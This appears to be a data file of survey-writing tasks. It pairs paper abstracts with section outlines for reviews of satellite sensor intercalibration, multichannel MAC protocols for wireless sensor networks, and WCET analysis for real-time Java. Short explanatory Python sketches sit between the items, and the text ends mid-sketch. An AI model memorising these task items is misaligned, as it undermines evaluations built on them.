These show a ±2.8% standard deviation (1 σ) for the six solar-reflective bands. Analysis and preliminary results of a second, independent calibration method based on radiance measurements from a helicopter at White Sands indicate that this is potentially an accurate method for corroborating the results from the reflectance-based method. --- paper_title: 2010 ceos field reflectance intercomparisons lessons learned paper_content: This paper summarizes lessons learned from the 2009 and 2010 joint field campaigns to Tuz Golu, Turkey. Emphasis is placed on the 2010 campaign related to understanding the equipment and measurement protocols, processing schemes, and traceability to SI quantities. Participants in both 2009 and 2010 used an array of measurement approaches to determine surface reflectance. One lesson learned is that even with all of the differences in collection between groups, the differences in reflectance are currently dominated by instrumental artifacts including knowledge of the white reference. Processing methodology plays a limited role once the bi-directional reflectance of the white reference is used rather than a hemispheric-directional value. The lack of a basic set of measurement protocols, or best practices, limits a group's ability to ensure SI traceability and the development of proper error budgets. Finally, rigorous attention to sampling methodology and its impact on instrument behavior is needed. The results of the 2009 and 2010 joint campaigns clearly demonstrate both the need and utility of such campaigns and such comparisons must continue in the future to ensure a coherent set of data that can span multiple sensor types and multiple decades. --- paper_title: The Miami2001 Infrared Radiometer Calibration and Intercomparison. Part II: Shipboard Results paper_content: The second calibration and intercomparison of infrared radiometers (Miami2001) was held at the University of Miami’s Rosenstiel School of Marine and Atmospheric Science (RSMAS) during a workshop held from May to June 2001. The radiometers targeted in these two campaigns (laboratory-based and at-sea measurements) are those used to validate the skin sea surface temperatures and land surface temperatures derived from the measurements of imaging radiometers on earth observation satellites. These satellite instruments include those on currently operational satellites and others that will be launched within two years following the workshop. The experimental campaigns were completed in one week and included laboratory measurements using blackbody calibration targets characterized by the National Institute of Standards and Technology (NIST), and an intercomparison of the radiometers on a short cruise on board the R/V F. G. Walton Smith in Gulf Stream waters off the eastern coast of Florida. This paper reports on the results obtained from the shipborne measurements. Seven radiometers were mounted alongside each other on the R/V Walton Smith for an intercomparison under seagoing conditions. The ship results confirm that all radiometers are suitable for the validation of land surface temperature, and the majority are able to provide high quality data for the more difficult validation of satellitederived sea surface temperature, contributing less than 0.1 K to the error budget of the validation. The measurements provided by two prototype instruments developed for ship-of-opportunity use confirmed their potential to provide regular reliable data for satellite-derived SST validation. 
Four high quality radiometers showed agreements within 0.05 K confirming that these instruments are suitable for detailed studies of the dynamics of air‐sea interaction at the ocean surface as well as providing high quality validation data. The data analysis confirms the importance of including an accurate correction for reflected sky radiance when using infrared radiometers to measure SST. The results presented here also show the value of regular intercomparisons of ground-based instruments that are to be used for the validation of satellite-derived data products—products that will be an essential component of future assessments of climate change and variability. --- paper_title: Cross Calibration Over Desert Sites: Description, Methodology, and Operational Implementation paper_content: Radiometric cross calibration of Earth observation sensors is a crucial need to guarantee or quantify the consistency of measurements from different sensors. Twenty desert sites, historically selected, are revisited, and their radiometric profiles are described for the visible to the near-infrared spectral domain. Therefore, acquisitions by various sensors over these desert sites are collected into a dedicated database, Structure d'Accueil des Donnees d'Etalonnage, defined to manage operational calibrations and the required SI traceability. The cross-calibration method over desert sites is detailed. Surface reflectances are derived from measurements by a reference sensor and spectrally interpolated to derive the surface and then top-of-atmosphere reflectances for spectral bands of the sensor to calibrate. The comparison with reflectances really measured provides an estimation of the cross calibration between the two sensors. Results illustrate the efficiency of the method for various pairs of sensors among AQUA-Moderate Resolution Imaging Spectroradiometer (MODIS), Environmental Satellite-Medium Resolution Imaging Spectrometer (MERIS), Polarization and Anisotropy of Reflectance for Atmospheric Sciences Couples With Observations From a Lidar (PARASOL)-Polarization and Directionality of the Earth Reflectances (POLDER), and Satellite pour l'Observation de la Terre 5 (SPOT5)-VEGETATION. MERIS and MODIS calibrations are found to be very consistent, with a discrepancy of 1%, which is close to the accuracy of the method. A larger bias of 3% was identified between VEGETATION-PARASOL on one hand and MERIS-MODIS on the other hand. A good consistency was found between sites, with a standard deviation of 2% for red to near-infrared bands, increasing to 4% and 6% for green and blue bands, respectively. The accuracy of the method, which is close to 1%, may also depend on the spectral bands of both sensor to calibrate and reference sensor (up to 5% in the worst case) and their corresponding geometrical matching. ---
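As a rough illustration of the desert-site cross-calibration idea summarized above (surface reflectance derived from a reference sensor, spectral interpolation to the target band, and comparison with the measured top-of-atmosphere reflectance), a simplified sketch might look as follows; the spectra, spectral responses, and reflectance values are invented for the example and atmospheric effects are ignored:

```python
import numpy as np

def band_average(wl, spectrum, response):
    """Spectral-response-weighted band-average reflectance."""
    return np.trapz(spectrum * response, wl) / np.trapz(response, wl)

# Hypothetical wavelength grid (nm), bright desert-like spectrum and band responses.
wl = np.linspace(600.0, 900.0, 301)
desert = 0.20 + 0.0005 * (wl - 600.0)
resp_ref = np.exp(-0.5 * ((wl - 670.0) / 15.0) ** 2)   # reference sensor red band
resp_tgt = np.exp(-0.5 * ((wl - 680.0) / 20.0) ** 2)   # sensor to calibrate, red band

# Spectral band adjustment factor between the two bands for this surface type.
sbaf = band_average(wl, desert, resp_tgt) / band_average(wl, desert, resp_ref)

# Hypothetical collocated top-of-atmosphere reflectances over the site.
rho_ref = np.array([0.285, 0.290, 0.288, 0.292])   # reference sensor, already calibrated
rho_tgt = np.array([0.301, 0.307, 0.304, 0.309])   # sensor to calibrate

rho_tgt_predicted = sbaf * rho_ref
gain = np.mean(rho_tgt / rho_tgt_predicted)
print(f"SBAF = {sbaf:.4f}, estimated cross-calibration gain = {gain:.4f}")
```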
Title: Overview of Intercalibration of Satellite Instruments
Section 1: Introduction
Description 1: Provide an introduction and describe the general importance of intercalibration for satellite instruments.
Section 2: Need for Intercalibration
Description 2: Explain the necessity of intercalibrating satellite instruments, addressing issues of traceability and interoperability.
Section 3: General Intercalibration Problems
Description 3: Outline common problems encountered during the intercalibration process, including traceability, sampling differences, and scene variability.
Section 4: Intercalibration Methods
Description 4: Summarize various methods used for intercalibrating satellite instruments, such as SNO, statistical intercalibration, and double-differencing methods.
Section 5: Ongoing Joint Efforts
Description 5: Describe current collaborative efforts, such as GSICS and CEOS, aimed at standardizing and improving intercalibration practices.
Section 6: Summary
Description 6: Provide a summary of the key points discussed in the paper, emphasizing the importance of intercalibration for the consistency and accuracy of satellite observations.
A survey on multichannel assignment protocols in Wireless Sensor Networks
10
--- paper_title: Protocols and architectures for channel assignment in wireless mesh networks paper_content: The use of multiple channels can substantially improve the performance of wireless mesh networks. Considering that the IEEE PHY specification permits the simultaneous operation of three non-overlapping channels in the 2.4GHz band and 12 non-overlapping channels in the 5GHz band, a major challenge in wireless mesh networks is how to efficiently assign these available channels in order to optimize the network performance. We survey and classify the current techniques proposed to solve this problem in both single-radio and multi-radio wireless mesh networks. This paper also discusses the issues in the design of multi-channel protocols and architectures. --- paper_title: Multi-channel mac for ad hoc networks: handling multi-channel hidden terminals using a single transceiver paper_content: This paper proposes a medium access control (MAC) protocol for ad hoc wireless networks that utilizes multiple channels dynamically to improve performance. The IEEE 802.11 standard allows for the use of multiple channels available at the physical layer, but its MAC protocol is designed only for a single channel. A single-channel MAC protocol does not work well in a multi-channel environment, because of the multi-channel hidden terminal problem. Our proposed protocol enables hosts to utilize multiple channels by switching channels dynamically, thus increasing network throughput. The protocol requires only one transceiver per host, but solves the multi-channel hidden terminal problem using temporal synchronization. Our scheme improves network throughput significantly, especially when the network is highly congested. The simulation results show that our protocol successfully exploits multiple channels to achieve higher throughput than IEEE 802.11. Also, the performance of our protocol is comparable to another multi-channel MAC protocol that requires multiple transceivers per host. Since our protocol requires only one transceiver per host, it can be implemented with a hardware complexity comparable to IEEE 802.11. --- paper_title: TDMA-ASAP: Sensor Network TDMA Scheduling with Adaptive Slot-Stealing and Parallelism paper_content: TDMA has been proposed as a MAC protocol for wireless sensor networks (WSNs) due to its efficiency in high WSN load. However, TDMA is plagued with shortcomings; we present modifications to TDMA that will allow for the same efficiency of TDMA, while allowing the network to conserve energy during times of low load (when there is no activity being detected). Recognizing that aggregation plays an essential role in WSNs, TDMA-ASAP adds to TDMA: (a) transmission parallelism based on a level-by-level localized graph-coloring, (b) appropriate sleeping between transmissions ("napping"), (c) judicious and controlled TDMA slot stealing to avoid empty slots being left unused and (d) intelligent scheduling/ordering of transmissions. Our results show that TDMA-ASAP's unique combination of TDMA, slot-stealing, napping, and message aggregation significantly outperforms other hybrid WSN MAC algorithms and has a performance that is close to optimal in terms of energy consumption and overall delay. --- paper_title: Z-MAC: a hybrid MAC for wireless sensor networks paper_content: This paper presents the design, implementation and performance evaluation of a hybrid MAC protocol, called Z-MAC, for wireless sensor networks that combines the strengths of TDMA and CSMA while offsetting their weaknesses. 
Like CSMA, Z-MAC achieves high channel utilization and low latency under low contention and like TDMA, achieves high channel utilization under high contention and reduces collision among two-hop neighbors at a low cost. A distinctive feature of Z-MAC is that its performance is robust to synchronization errors, slot assignment failures, and time-varying channel conditions; in the worst case, its performance always falls back to that of CSMA. Z-MAC is implemented in TinyOS. --- paper_title: EM-MAC: a dynamic multichannel energy-efficient MAC protocol for wireless sensor networks paper_content: Medium access control (MAC) protocols for wireless sensor networks face many challenges, including energy-efficient operation and robust support for varying traffic loads, in spite of effects such as wireless interference or even possible wireless jamming attacks. This paper presents the design and evaluation of the EM-MAC (Efficient Multichannel MAC) protocol, which addresses these challenges through the introduction of novel mechanisms for adaptive receiver-initiated multichannel rendezvous and predictive wake-up scheduling. EM-MAC substantially enhances wireless channel utilization and transmission efficiency while resisting wireless interference and jamming by enabling every node to dynamically optimize the selection of wireless channels it utilizes based on the channel conditions it senses, without use of any reserved control channel. EM-MAC achieves high energy efficiency by enabling a sender to predict the receiver's wake-up channel and wake-up time. Implemented in TinyOS on MICAz motes, EM-MAC substantially outperformed other MAC protocols studied. EM-MAC maintained the lowest sender and receiver duty cycles, the lowest packet delivery latency, and 100% packet delivery ratio across all experiments. Our evaluation includes single-hop and multihop flows, as well as experiments with heavy ZigBee interference, constant ZigBee jamming, and Wi-Fi interference. --- paper_title: Low-overhead dynamic multi-channel MAC for wireless sensor networks paper_content: Most of the existing popular MAC protocols for Wireless Sensor Networks (WSN) only use a single channel for relaying data. Most popular platforms, however, are equipped with a radio chip capable of switching its channel, and are therefore not restricted to a single-channel operation. Operating on multiple channels can increase bandwidth and can provide robustness against external interference. We argue that this feature is not only useful for dense, high-throughput WSNs but also for sparser networks with low average data rates but with occasional traffic bursts. We present MuChMAC, a low-overhead Multi-Channel MAC protocol which uses a combination of TDMA and asynchronous MAC techniques to exploit multi-channel operation without the need for coordination or tight synchronization between nodes. We describe an interface to scale MuChMAC's duty cycle to adapt to varying traffic conditions or energy constraints. We demonstrate MuChMAC's usefulness on a testbed consisting of Sentilla JCreate motes running it as the MAC layer for Contiki-based applications. --- paper_title: MMSN: Multi-Frequency Media Access Control for Wireless Sensor Networks paper_content: Multi-frequency media access control has been well understood in general wireless ad hoc networks, while in wireless sensor networks, researchers still focus on single frequency solutions. 
In wireless sensor networks, each device is typically equipped with a single radio transceiver and applications adopt much smaller packet sizes compared to those in general wireless ad hoc networks. Hence, the multi-frequency MAC protocols proposed for general wireless ad hoc networks are not suitable for wireless sensor network applications, which we further demonstrate through our simulation experiments. In this paper, we propose MMSN, which takes advantage of multi-frequency availability while, at the same time, taking into account the restrictions in wireless sensor networks. In MMSN, four frequency assignment options are provided to meet different application requirements. A scalable media access is designed with efficient broadcast support. Also, an optimal non-uniform backoff algorithm is derived and its lightweight approximation is implemented in MMSN, which significantly reduces congestion in the time synchronized media access design. Through extensive experiments, MMSN exhibits prominent ability to utilize parallel transmission among neighboring nodes. It also achieves increased energy efficiency when multiple physical frequencies are available. --- paper_title: Traffic-Aware Channel Assignment in Wireless Sensor Networks paper_content: Existing frequency assignment efforts in wireless sensor network research focus on balancing available physical frequencies among neighboring nodes, without paying attention to the fact that different nodes have different traffic volumes. Ignoring the different traffic requirements in different nodes in frequency assignment design leads to poor MAC performance. Therefore, in this paper, we are motivated to propose traffic-aware frequency assignment, which considers nodes' traffic volumes when making frequency decisions. We incorporate our traffic-aware frequency assignment design into an existing multi-channel MAC, and compare the performance with two conventional frequency assignment schemes. Our performance evaluation demonstrates that traffic-aware channel assignment can greatly improve multi-channel MAC performance. Our traffic-aware assignment scheme greatly enhances the packet delivery ratio and system throughput, while reducing channel access delay and energy consumption. --- paper_title: ARM: An asynchronous receiver-initiated multichannel MAC protocol with duty cycling for WSNs paper_content: This paper proposes ARM, a receiver-initiated MAC protocol with duty cycling to tackle control channel saturation, triple hidden terminal and low broadcast reliability problems in asynchronous multi-channel WSNs. By adopting a receiver-initiated transmission scheme and probability-based random channel selection, ARM effectively solves control channel saturation and triple hidden terminal problems. Further, ARM employs a receiver-adjusted broadcast scheme to guarantee broadcast reliability for broadcast-intensive applications. Via the theoretical analysis, two factors that assist ARM to handle these problems are derived. The simulation and real testbed experimental results show that via solving these three problems ARM achieves significant improvement in energy efficiency and throughput. Moreover, ARM exhibits a prominent ability to enhance its broadcast reliability. --- paper_title: Realistic and Efficient Multi-Channel Communications in Wireless Sensor Networks paper_content: This paper demonstrates how to use multiple channels to improve communication performance in Wireless Sensor Networks (WSNs). 
We first investigate multi-channel realities in WSNs through intensive empirical experiments with Micaz motes. Our study shows that current multi-channel protocols are not suitable for WSNs, because of the small number of available channels and unavoidable time errors found in real networks. With these observations, we propose a novel tree-based multichannel scheme for data collection applications, which allocates channels to disjoint trees and exploits parallel transmissions among trees. In order to minimize interference within trees, we define a new channel assignment problem which is proven NP-complete. Then we propose a greedy channel allocation algorithm which outperforms other schemes in dense networks with a small number of channels. We implement our protocol, called TMCP, in a real testbed. Through both simulation and real experiments, we show that TMCP can significantly improve network throughput and reduce packet losses. More importantly, evaluation results show that TMCP better accommodates multi-channel realities found in WSNs than other multi-channel protocols. --- paper_title: Y-MAC: An Energy-Efficient Multi-channel MAC Protocol for Dense Wireless Sensor Networks paper_content: As the use of wireless sensor networks (WSNs) becomes widespread, node density tends to increase. This poses a new challenge for Medium Access Control (MAC) protocol design. Although traditional MAC protocols achieve low-power operation, they use only a single channel which limits their performance. Several multi-channel MAC protocols for WSNs have been recently proposed. One of the key observations is that these protocols are less energy efficient than single-channel MAC protocols under light traffic conditions. In this paper, we propose an energy efficient multi-channel MAC protocol, Y-MAC, for WSNs. Our goal is to achieve both high performance and energy efficiency under diverse traffic conditions. In contrast to most of previous multi-channel MAC protocols for WSNs, we implemented Y-MAC on a real sensor node platform and conducted extensive experiments to evaluate its performance. Experimental results show that Y-MAC is energy efficient and maintains high performance under high-traffic conditions. --- paper_title: Regret Matching Based Channel Assignment for Wireless Sensor Networks paper_content: Multiple channels in Wireless Sensor Networks (WSNs) are often exploited to support parallel transmission and reduce interference. However, there are many challenges, such as extra communication overhead, posed to the energy constraint of WSNs by the multi-channel usage coordination. In this paper, we propose a Regret Matching based Channel Assignment algorithm (RMCA) to address those challenges. The advantage of RMCA is that it is highly distributed and requires very limited information exchanges among sensor nodes. It converges almost surely to the set of correlated equilibrium. Moreover, RMCA can adapt the channel assignment among sensor nodes to the time-variant flows and network topology. Simulations show that RMCA achieves good network performance in terms of both delivery ratio and packet latency. 
--- paper_title: Multi-Channel Assignment in Wireless Sensor Networks: A Game Theoretic Approach paper_content: In this paper, we formulate multi-channel assignment in Wireless Sensor Networks (WSNs) as an optimization problem and show it is NP-hard. 
We then propose a distributed Game Based Channel Assignment algorithm (GBCA) to solve the problem. GBCA takes into account both the network topology information and transmission routing information. We prove that there exists at least one Nash Equilibrium in the channel assignment game. Furthermore, we analyze the sub-optimality of Nash Equilibrium and the convergence of the Best Response in the game. Simulation results are given to demonstrate that GBCA can reduce interference significantly and achieve satisfactory network performance in terms of delivery ratio, throughput, channel access delay and energy consumption. ---
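Several of the schemes surveyed above (for example, TMCP's greedy allocation and the graph-coloring used by TDMA-ASAP) boil down to interference-aware channel assignment over a conflict graph. A toy sketch of such a greedy assignment, with a made-up topology and channel count, is given below; it is not the algorithm of any one of the cited protocols:

```python
from collections import defaultdict

def two_hop_neighbours(adj, node):
    one_hop = set(adj[node])
    two_hop = set()
    for n in one_hop:
        two_hop |= set(adj[n])
    return (one_hop | two_hop) - {node}

def greedy_channel_assignment(adj, num_channels):
    """Each node takes the channel least used within its two-hop neighbourhood."""
    assignment = {}
    # Most constrained (highest degree) nodes are assigned first.
    for node in sorted(adj, key=lambda n: len(adj[n]), reverse=True):
        usage = defaultdict(int)
        for nb in two_hop_neighbours(adj, node):
            if nb in assignment:
                usage[assignment[nb]] += 1
        assignment[node] = min(range(num_channels), key=lambda c: (usage[c], c))
    return assignment

# Hypothetical six-node sensor network as an adjacency list, three channels.
adj = {
    0: [1, 2], 1: [0, 2, 3], 2: [0, 1, 4],
    3: [1, 4, 5], 4: [2, 3, 5], 5: [3, 4],
}
print(greedy_channel_assignment(adj, num_channels=3))
```

Such static assignments avoid per-packet coordination overhead, which is one of the trade-offs the classification sections of the survey discuss.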
Title: A survey on multichannel assignment protocols in Wireless Sensor Networks
Section 1: INTRODUCTION
Description 1: This section should introduce the need for multichannel assignment protocols in Wireless Sensor Networks (WSNs) and the challenges they address.
Section 2: ISSUES IN MULTICHANNEL COMMUNICATIONS
Description 2: This section should discuss the new problems and complexities introduced by multichannel communication compared to single channel communication.
Section 3: COMMUNICATIONS
Description 3: This section should summarize the benefits brought by multichannel communications, such as increased parallel transmission and robustness.
Section 4: CLASSIFICATION OF EXISTING MULTICHANNEL ASSIGNMENT PROTOCOLS IN WSNS
Description 4: This section should classify existing multichannel assignment protocols based on channel assignment methods, channel selection policies, and channel coordination techniques.
Section 5: Channel assignment method
Description 5: This subsection should categorize channel assignment methods into static, semi-dynamic, and dynamic, and discuss the trade-offs of each.
Section 6: Channel selection policy
Description 6: This subsection should explain the various policies for selecting channels, such as Round Robin, least load channel, and probabilistic methods.
Section 7: Channel coordination
Description 7: This subsection should describe the methods for coordinating channels between the sender and receiver, including implicit and explicit coordination, and their respective techniques.
Section 8: Discussion
Description 8: This subsection should explore the relationships between different channel assignment and coordination techniques.
Section 9: TAXONOMY PROPOSED
Description 9: This section should provide a proposed taxonomy for multichannel protocols based on specific criteria and analyze existing protocols according to these criteria.
Section 10: CONCLUSION
Description 10: This section should summarize the challenges and future directions for multichannel communications in WSNs.
A Survey of Worst-Case Execution Time Analysis for Real-Time Java
10
--- paper_title: Real-Time Euclid: A language for reliable real-time systems paper_content: Real-Time Euclid, a language designed specifically to address reliability and guaranteed schedulability issues in real-time systems, is introduced. Real-Time Euclid uses exception handlers and import/export lists to provide comprehensive error detection, isolation, and recovery. The philosophy of the language is that every exception detectable by the hardware or the software must have an exception-handler clause associated with it. Moreover, the language definition forces every construct in the language to be time- and space-bounded. Consequently, Real-Time Euclid programs can always be analyzed for guaranteed schedulability of their processes. Thus, it is felt that Real-Time Euclid is well-suited for writing reliable real-time software. --- paper_title: The real-time specification for Java paper_content: New languages, programming disciplines, operating systems, and software engineering techniques sometimes hold considerable potential for real-time software developers. A promising area of interest, but one fairly new to the real-time community, is object-oriented programming. Java, for example, draws heavily from object orientation and is highly suitable for extension to real-time and embedded systems. Recognizing this fit between Java and real-time software development, the Real-Time for Java Experts Group (RTJEG) began developing the real-time specification for Java (RTSJ) in March 1999 under the Java Community Process. This article explains RTSJ's features and the thinking behind the specification's design. The goal of the RTJEG, of which the authors are both members, was to provide a platform, a Java execution environment and application program interface (API), that lets programmers correctly reason about the temporal behavior of executing software. --- paper_title: Portable worst-case execution time analysis using Java Byte Code paper_content: Addresses the problem of performing worst-case execution time (WCET) analysis of Java Byte Code (JBC), which may be generated from different compilers and from different source languages. The motivation for the framework presented is to provide WCET analysis which is portable and therefore more likely to be used in an industrial context. Two issues are addressed in this paper: how to extract data flow and control flow information from JBC programs, and how to provide a compiler-/language-independent mechanism to introduce WCET annotations in the source code. We show that an annotation mechanism based on calls to a static class with empty methods result in similar code when generated by Java or Ada compilers. 
--- paper_title: Asynchronous Transfer of Control in the RTSJ-compliant Java Processor paper_content: Asynchronous Transfer of Control (ATC) is a crucial mechanism for real-time applications, and is currently provided in the Real-Time Specification for Java (RTSJ). This paper proposes a framework to implement ATC in the RTSJ-compliant Java processor based on the instruction optimization method proposed in our previous work [1]. Because most of the processing is done before bytecode execution in this method, the implementation using our framework is straightforward. Moreover, its Worst Case Execution Time (WCET) is more predictable. --- paper_title: Real-time objects on the bare metal: an efficient hardware realization of the Java(TM) Virtual Machine paper_content: Combining the design-time efficiency of object oriented development with the runtime efficiency of direct hardware support for object oriented execution, aJile Systems has developed a low-power hardware implementation of the Java Virtual Machine for real time and embedded applications. AJile's hardware provides direct support for the entire JVM instruction set and thread model, obviating the need for a Java interpreter or Just-in-Time (JIT) compiler, as well as the traditional Real-Time Operating System (RTOS). AJile's hardware technology also supports multiple JVM contexts executing on the same CPU, enhancing safety and security by guaranteeing space and time allotments for multiple Java applications. Combined with a Java 2 Micro Edition (J2ME) runtime and a back-end target build tool, these technologies constitute an efficient platform for the development of real time embedded applications entirely in Java. 
--- paper_title: Gain time reclaiming in high performance real-time Java systems paper_content: The run-time characteristics of Java, such as high frequency of method invocation, dynamic dispatching and dynamic loading, make Java more difficult than other object-oriented programming languages, such as C++, for conducting Worst-Case Execution Time (WCET) analysis. To offer a more flexible way to develop object-oriented real-time applications in the realtime Java environment without loss of predictability and performance, we propose a novel gain time reclaiming framework integrated with WCET analysis. This paper demonstrates how to improve the utilisation and performance of the whole system by reclaiming gain time at run-time. Our approach shows that integrating WCET with gain time reclaiming can not only provide a more flexible environment, but it also does not necessarily result in unsafe or unpredictable timing behaviour. --- paper_title: Low-level analysis of a portable Java byte code WCET analysis framework paper_content: To support portability, worst-case execution time (WCET) analysis of Java byte code is performed at two levels - machine-independent program flow analysis at a higher level and machine-dependent timing analysis of individual program constructs at a lower level. This paper contributes a WCET analysis that computes worst-case execution frequencies of Java byte codes within the software being analysed and accounts for platform-dependent information, i.e. the processor's pipeline. The main part of the approach is platform-independent; only a limited analysis is needed on a per-platform basis. --- paper_title: XRTJ: An Extensible Distributed High-Integrity Real-Time Java Environment paper_content: Despite Java's initial promise of providing a reliable and cost-effective platform-independent environment, the language appears to be unfavourable in the area of high-integrity systems and real-time systems. To encourage the use of Java in the development of distributed high-integrity real-time systems, the language environment must provide not only a well-defined specification or subset, but also a complete environment with appropriate analysis tools. We propose an extensible distributed high-integrity real-time Java environment, called XRTJ, that supports three attributes, i.e., predictable programming model, dependable static analysis environment, and reliable distributed run-time environment. The goal of this paper is to present an overview of our on-going project and report on its current status. We also raise some important issues in the area of distributed high-integrity systems, and present how we can deal with them by defining two distributed run-time models where safe and timely operations will be supported. --- paper_title: WCET analysis of reusable portable code paper_content: Traditional worst-case execution-time analysis (WCET analysis) computes upper bounds for the execution times of code. This analysis uses knowledge about the execution context of the code and about the target architecture. In contrast, the WCET analysis for reusable and portable code has to abstract from parameters that are unknown until the code is finally used. The analysis is done in two steps. The first step computes abstract WCET information to support the reuse and portability of the WCET information. The second step uses the abstract WCET information to compute concrete WCET bounds when the application context and the timing parameters of the target system are known. 
The paper describes each of the two analysis steps. It demonstrates how WCET information can be made portable and reusable. --- paper_title: HIDOORS - a high integrity distributed deterministic Java environment paper_content: This paper presents the design of HIDOORS, an integrated development environment suitable for embedded distributed real-time systems, based on the Java programming language. HIDOORS will cover all the life-cycle of real-time software development with extensions to existing tools (UML modeling, Java compiler, Java Virtual Machine, and a worst case execution time analysis tool) that will all be integrated into a single integrated development environment. The system will also assist the developer in distributing the application, by providing faster RMI and a distributed event manager that provides strict timing guarantees. This paper is written at the beginning of HIDOORS development, and as such, it presents only the defined objectives and the early architecture of the system; further developments will be the subject of future works. --- paper_title: WCET analysis for a Java processor paper_content: In this paper we propose a solution for a worst-case execution time (WCET) analyzable Java system: a combination of a time predictable Java processor and a tool that performs WCET analysis of Java bytecode. We present a Java processor, called JOP, designed for time-predictable execution of real-time tasks. JOP is an implementation of the Java virtual machine (JVM) in hardware. The execution time of bytecodes, the instructions of the JVM, is known cycle accurate for JOP. Therefore, JOP simplifies the low-level WCET analysis. A method cache, that fills whole Java methods into the cache, is analyzable with respect to the WCET. The WCET analysis tool is based on integer linear programming. The tool performs the low-level analysis at the bytecode level and integrates the method cache analysis for a two block cache. --- paper_title: Hard real-time garbage collection in the Jamaica virtual machine paper_content: Java's automatic memory management is the main reason that prevents Java from being used in hard real-time environments. We present the garbage collection mechanism that is used by the Jamaica Virtual Machine, an implementation of the Java Virtual Machine Specification. This mechanism differs significantly from existing implementations in the way threads are implemented, root references are found and in the object layout that is used. The implementation provides hard real-time guarantees while it allows unrestricted use of the Java language. Even dynamic allocation of normal garbage collected Java objects is possible with hard real-time guarantees. 
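To make the flow of such analyses concrete: once per-block execution times (for example, JOP's cycle-accurate bytecode timings) and loop bounds are known, a WCET bound can be composed over the program structure. The JOP tool described above formulates this as an integer linear program (IPET); the toy sketch below instead uses a simpler tree-based composition, and all cycle counts and loop bounds are invented for illustration:

```python
from dataclasses import dataclass
from typing import List

@dataclass
class Block:           # straight-line code with a known worst-case cycle count
    cycles: int

@dataclass
class Seq:             # sequential composition of fragments
    parts: List[object]

@dataclass
class Branch:          # if/else: charge the more expensive alternative
    cond_cycles: int
    then_part: object
    else_part: object

@dataclass
class Loop:            # loop with an annotated maximum iteration count
    bound: int
    body: object

def wcet(node) -> int:
    if isinstance(node, Block):
        return node.cycles
    if isinstance(node, Seq):
        return sum(wcet(p) for p in node.parts)
    if isinstance(node, Branch):
        return node.cond_cycles + max(wcet(node.then_part), wcet(node.else_part))
    if isinstance(node, Loop):
        return node.bound * wcet(node.body)
    raise TypeError(node)

# Hypothetical method: prologue, a loop of at most 10 iterations around a branch, epilogue.
method = Seq([Block(12),
              Loop(10, Seq([Branch(4, Block(20), Block(8)), Block(6)])),
              Block(5)])
print("WCET bound (cycles):", wcet(method))
```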
--- paper_title: An interactive environment for real-time software development paper_content: Object-oriented languages, in particular Java, are beginning to make their way into embedded real-time software development. This is not only for the safety and expressiveness of the source language; the mobility and dynamic loading of Java bytecode make it particularly useful in embedded real-time systems. However using such languages in real-time systems makes it more difficult to predict the worst-case execution time of tasks. Such predictions are necessary for predictable task scheduling in the developed system. Garbage collection, common in object-oriented languages, must be considered; to schedule garbage collection safely, we must know how much memory it has to handle. Dynamic binding in conjunction with dynamic loading of code also needs treatment. We show how techniques for predicting time and memory demands of object-oriented programs are integrated into the Skanerost development environment. The environment explicitly targets an iterative development process, which is particularly important in real-time software development since time and memory demands cannot be determined until the code is written. Design changes due to timing problems become more costly as development progresses, and Skanerost allows such problems to be detected early. --- paper_title: ANALYZING EXECUTION-TIME OF OBJECT-ORIENTED PROGRAMS USING ABSTRACT INTERPRETATION paper_content: As a result of the industrial deployment of real-time systems, there is an increasing demandfor methods to perform safe and tight calculation of the worst case execution time (WCET) ofprograms. The ... --- paper_title: An effective instruction optimization method for embedded real-time Java processor paper_content: A method to optimize instructions in embedded real-time Java processors is proposed. It can reduce the CPI (cycles per instruction) and simplify the implementation of complex instructions, as well as make the WCET (worst case execution time) of the optimized instructions more predictable. Because this method optimizes instruction itself it can be used together with other architectural optimization methods such as pipeline or out-of-order execution etc. --- paper_title: Addressing dynamic dispatching issues in WCET analysis for object-oriented hard real-time systems paper_content: There is a trend towards using object-oriented programming languages to develop hard real-time applications. However some object-oriented features, such as dynamic dispatching and dynamic loading, are prohibited from being used in hard realtime systems because they are either unpredictable and/or un-analysable. Arguably, these restrictions could make applications very limited and unrealistic since they could eliminate the major advantages of object-oriented programming. This paper demonstrates how we can address the dynamic dispatching issues in Worst-Case Execution Timing (WCET) analysis with minimum annotations. The major contributions include: discussing the major issues involved in using and restricting dynamic binding features; weakening the restriction of using dynamic dispatching; presenting how to estimate tighter and safer WCET value in object-oriented hard real-time systems. Our approach shows that allowing the use of dynamic dispatching can not only provide a more flexible way to develop object-oriented hard real-time applications, but also does not necessarily result in unpredictable timing analysis. 
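The dynamic dispatching abstract immediately above argues that virtual calls can still be bounded by considering the set of methods a call site may resolve to. A minimal sketch of that idea follows; the class names, per-method WCET values, and the assumption that the receiver-type set is known from annotations or class-hierarchy analysis are all invented for illustration.

```python
# Illustrative sketch: bounding a dynamically dispatched call by taking the
# maximum WCET over all methods the call site may resolve to at run time.
# The per-implementation WCET values (in cycles) are invented for the example.
wcet_of_implementation = {
    ("Circle", "area"): 120,
    ("Rectangle", "area"): 80,
    ("Polygon", "area"): 950,   # expensive general case
}

def wcet_of_virtual_call(method, possible_receiver_types):
    """Worst case over every implementation the call may dispatch to."""
    return max(wcet_of_implementation[(t, method)]
               for t in possible_receiver_types)

# Without extra information the bound must assume the most expensive
# implementation; annotations that exclude Polygon at this call site
# tighten the bound considerably.
print(wcet_of_virtual_call("area", ["Circle", "Rectangle", "Polygon"]))  # 950
print(wcet_of_virtual_call("area", ["Circle", "Rectangle"]))             # 120
```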
--- paper_title: Addressing dynamic dispatching issues in WCET analysis for object-oriented hard real-time systems paper_content: There is a trend towards using object-oriented programming languages to develop hard real-time applications. However some object-oriented features, such as dynamic dispatching and dynamic loading, are prohibited from being used in hard realtime systems because they are either unpredictable and/or un-analysable. Arguably, these restrictions could make applications very limited and unrealistic since they could eliminate the major advantages of object-oriented programming. This paper demonstrates how we can address the dynamic dispatching issues in Worst-Case Execution Timing (WCET) analysis with minimum annotations. The major contributions include: discussing the major issues involved in using and restricting dynamic binding features; weakening the restriction of using dynamic dispatching; presenting how to estimate tighter and safer WCET value in object-oriented hard real-time systems. Our approach shows that allowing the use of dynamic dispatching can not only provide a more flexible way to develop object-oriented hard real-time applications, but also does not necessarily result in unpredictable timing analysis. ---
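The JOP WCET tool described earlier in this reference list formulates the bound as an integer linear program over basic-block execution counts (the IPET approach). The sketch below sets up such a program for a tiny, invented control-flow graph with one loop bounded at 10 iterations; it assumes SciPy is available and relaxes the problem to an LP, which suffices here because the optimum happens to be integral.

```python
# IPET-style WCET bound for a tiny CFG: entry block A, loop body B (at most
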